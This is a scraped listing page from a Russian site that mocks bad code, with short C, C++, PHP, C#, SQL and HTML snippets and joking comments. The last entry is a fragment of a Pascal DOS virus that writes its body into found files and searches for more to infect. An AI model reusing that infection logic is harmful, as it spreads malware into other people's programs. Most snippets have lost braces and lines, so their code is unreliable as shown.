1. Лучший говнокод

    В номинации:
    За время:
  2. Си / Говнокод #12269


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    #include <stdio.h>
    #include <conio.h>
    #include <windows.h>
    int main()
    	nachalo: system("cls");
    	int a;
    	printf("Write first number...");
    	scanf("%i", &a);
    	int b;
    	printf("Write second number...");
    	scanf("%i", &b);
    	int res1;
    	int res2;
    	int res3;
    	float res4;
    	int res5;
    	int res6;
    	printf("\nSumm of %i + %i = %i\n", a, b, res1);
    	printf("Difference of %i - %i = %i\n", a, b, res2);
    	printf("Production of %i * %i = %i\n", a, b, res3);
    	printf("Private of %i / %i = %.4f\n\n", a, b, res4);
    	printf("Square of %i is %i\n", a, res5);
    	printf("Square of %i is %i\n\n", b, res6);
    	int max;
    	max = (b>a) ? b:a;
    	printf("The greatest number of %i and %i is %d\n\n", a, b, max);
    	int choice;
    	printf("To run program again, press number 1, else numbers \nor symbols will close the program...\n> ");
    	scanf("%i", &choice);
    	if (choice == 1)
    		goto nachalo;
    	else (choice != 1);
    		return 0;

    Калькулятор. Nuff said

    heivizi, 11 Декабря 2012

    Комментарии (34)
  3. C++ / Говнокод #12009


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    #include <functional>
    using namespace std;
    class O{};
    class foo
       constexpr static auto anyGarbage = O(O(O(O())));//:Жаль, что написать auto anyGarbage = O(O(O(O()))); нельзя.
       O anyGarbage2 = O(O(O(O())));
       int var;
       std::function<void(int)> setter=[this](int s){(void)s;/*var=s;*/};

    Я хочу написать свои property, принимающие лямбды в качестве параметра setter и getter. Как сделать friend лямбду?

    USB, 26 Октября 2012

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  4. C++ / Говнокод #11942


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    std::function<int()> gl()
       int a=0;
       return [=]()mutable{return a++;};
    int main() 
       auto a=gl();
       return 0;


    Не совсем гавно, но порядок выполнения операторов вывода C++ для меня оказался неожиданным и не интуитивным.

    LispGovno, 17 Октября 2012

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  5. PHP / Говнокод #11900


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    PHP supports eight primitive types - four scalar types, two compound types and finally three special types.
    8 == 4+2+3?


    defecate-plusplus, 09 Октября 2012

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  6. C++ / Говнокод #11578


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    template <typename TYPE> class Ptr
        Ptr( const Ptr<TYPE> &other )
            this->Pointer_ = other.Pointer_;
            this->IsValid_ = other.IsValid_;
        Ptr( TYPE* &ptr ):
            if ( std::find( Ptr<TYPE>::List_.begin(), Ptr<TYPE>::List_.end(), ptr ) == Ptr<TYPE>::List_.end() )
                Ptr<TYPE>::List_.push_back( ptr );
            this->Pointer_ = ptr;
        inline Ptr<TYPE>& operator = ( const Ptr<TYPE> &other )
            this->Pointer_ = other.Pointer_;
            this->IsValid_ = other.IsValid_;
            return *this;
        inline Ptr<TYPE>& operator = ( TYPE* &ptr )
            if ( std::find( Ptr<TYPE>::List_.begin(), Ptr<TYPE>::List_.end(), ptr ) == Ptr<TYPE>::List_.end() )
                Ptr<TYPE>::List_.push_back( ptr );
            this->Pointer_ = ptr;
            this->IsValid_ = true;
            return *this;
        inline bool operator == ( const Ptr<TYPE> &other )
            return (this->Pointer_ == other.Pointer_) ? true:false;
        inline bool operator != ( const Ptr<TYPE> &other )
            return (this->Pointer_ != other.Pointer_) ? true:false;
        inline TYPE* operator -> ()
            return this->Pointer_;
        inline bool isValid() const
            if (!this->IsValid_)
                return false;
            return this->IsValid_ = ( (std::find( Ptr<TYPE>::List_.begin(), Ptr<TYPE>::List_.end(), this->Pointer_ ) == Ptr<TYPE>::List_.end() ) ? false:true );
        inline void release()
            if ( this->isValid() )
                Ptr<TYPE>::List_.erase( std::find( Ptr<TYPE>::List_.begin(), Ptr<TYPE>::List_.end(), this->Pointer_ ) );
                delete this->Pointer_;
            this->Pointer_ = 0;
            this->IsValid_ = false;
        inline TYPE* get()
            return this->Pointer_;
        TYPE* Pointer_;
        mutable bool IsValid_;
        static std::list < TYPE* > List_;
    template <typename TYPE> std::list < TYPE* > Ptr<TYPE>::List_;

    HaskellGovno, 12 Августа 2012

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  7. Куча / Говнокод #11553


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    <TITLE>The World Wide Web project</TITLE>
    <NEXTID N="55">
    <H1>World Wide Web</H1>The WorldWideWeb (W3) is a wide-area<A
    NAME=0 HREF="WhatIs.html">
    hypermedia</A> information retrieval
    initiative aiming to give universal
    access to a large universe of documents.<P>
    Everything there is online about
    W3 is linked directly or indirectly
    to this document, including an <A
    NAME=24 HREF="Summary.html">executive
    summary</A> of the project, <A
    NAME=29 HREF="Administration/Mailing/Overview.html">Mailing lists</A>
    , <A
    NAME=30 HREF="Policy.html">Policy</A> , November's  <A
    NAME=34 HREF="News/9211.html">W3  news</A> ,
    NAME=41 HREF="FAQ/List.html">Frequently Asked Questions</A> .
    NAME=44 HREF="../DataSources/Top.html">What's out there?</A>
    <DD> Pointers to the
    world's online information,<A
    NAME=45 HREF="../DataSources/bySubject/Overview.html"> subjects</A>
    , <A
    NAME=z54 HREF="../DataSources/WWW/Servers.html">W3 servers</A>, etc.
    NAME=46 HREF="Help.html">Help</A>
    <DD> on the browser you are using
    NAME=13 HREF="Status.html">Software Products</A>
    <DD> A list of W3 project
    components and their current state.
    (e.g. <A
    NAME=27 HREF="LineMode/Browser.html">Line Mode</A> ,X11 <A
    NAME=35 HREF="Status.html#35">Viola</A> ,  <A
    NAME=26 HREF="NeXT/WorldWideWeb.html">NeXTStep</A>
    , <A
    NAME=25 HREF="Daemon/Overview.html">Servers</A> , <A
    NAME=51 HREF="Tools/Overview.html">Tools</A> ,<A
    NAME=53 HREF="MailRobot/Overview.html"> Mail robot</A> ,<A
    NAME=52 HREF="Status.html#57">
    Library</A> )
    NAME=47 HREF="Technical.html">Technical</A>
    <DD> Details of protocols, formats,
    program internals etc
    NAME=40 HREF="Bibliography.html">Bibliography</A>
    <DD> Paper documentation
    on  W3 and references.
    NAME=14 HREF="People.html">People</A>
    <DD> A list of some people involved
    in the project.
    NAME=15 HREF="History.html">History</A>
    <DD> A summary of the history
    of the project.
    NAME=37 HREF="Helping.html">How can I help</A> ?
    <DD> If you would like
    to support the web..
    NAME=48 HREF="../README.html">Getting code</A>
    <DD> Getting the code by<A
    NAME=49 HREF="LineMode/Defaults/Distribution.html">
    anonymous FTP</A> , etc.</A>

    HTML первого в мире сайта, которому на днях исполнился 21 год.

    tirinox, 08 Августа 2012

    Комментарии (34)
  8. PHP / Говнокод #11444


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    private function lowercase($s) {
        $chars_lo = utf8_encode('abcdefghijklmnopqrstuvwxyzабвгдежзийклмнопрстуфхцчшщъыьэюяё');
        return strtr($s, $chars_hi, $chars_lo);

    Картина маслом: Велосипедист бьётся лбом о локали.
    Сие говно выдаёт нечто из греческого алфавита вместо 'ё'.

    vistefan, 19 Июля 2012

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  9. C# / Говнокод #11252


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    public class ImageWorkerSingleton
    	private static ImageWorkerSingleton instance;
    	private ImageWorkerSingleton() { }
    	public static ImageWorkerSingleton Instance
    			if (instance == null)
    				instance = new ImageWorkerSingleton();
    			return instance;
    	public void Init() {}
    	public string UrlToImage(Guid id, ImageTypeEnum imageType = ImageTypeEnum.PhotoUndefined)
    	public bool IsImageExist(Guid id, ImageTypeEnum imageType = ImageTypeEnum.PhotoUndefined)

    И на кой, здесь синглтон о_О

    DarkThinker, 20 Июня 2012

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  10. SQL / Говнокод #10979


    1. 1

    Название триггера в промышленной системе.
    Hint: zap_na_sklade - таблица

    Xps, 16 Июня 2012

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  11. Pascal / Говнокод #10539


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    { Infected it}
    BlockWrite(Go,PrograStart,Succ(VirusSize shr 7));
    { Say what has been done}
    WriteLn(UsePath +' infected.');
    Halt; {... and HALT the program}
    {The file has already been infected, search next}
    Reg.DS Seg(DTA);
    Reg.DX Ofs(DTA);
    {... Until no more files found}
    Until Odd(Reg.Flags);
    Write(''); { Give a smile}


    Вторая часть.

    dos_, 03 Июня 2012

    Комментарии (34)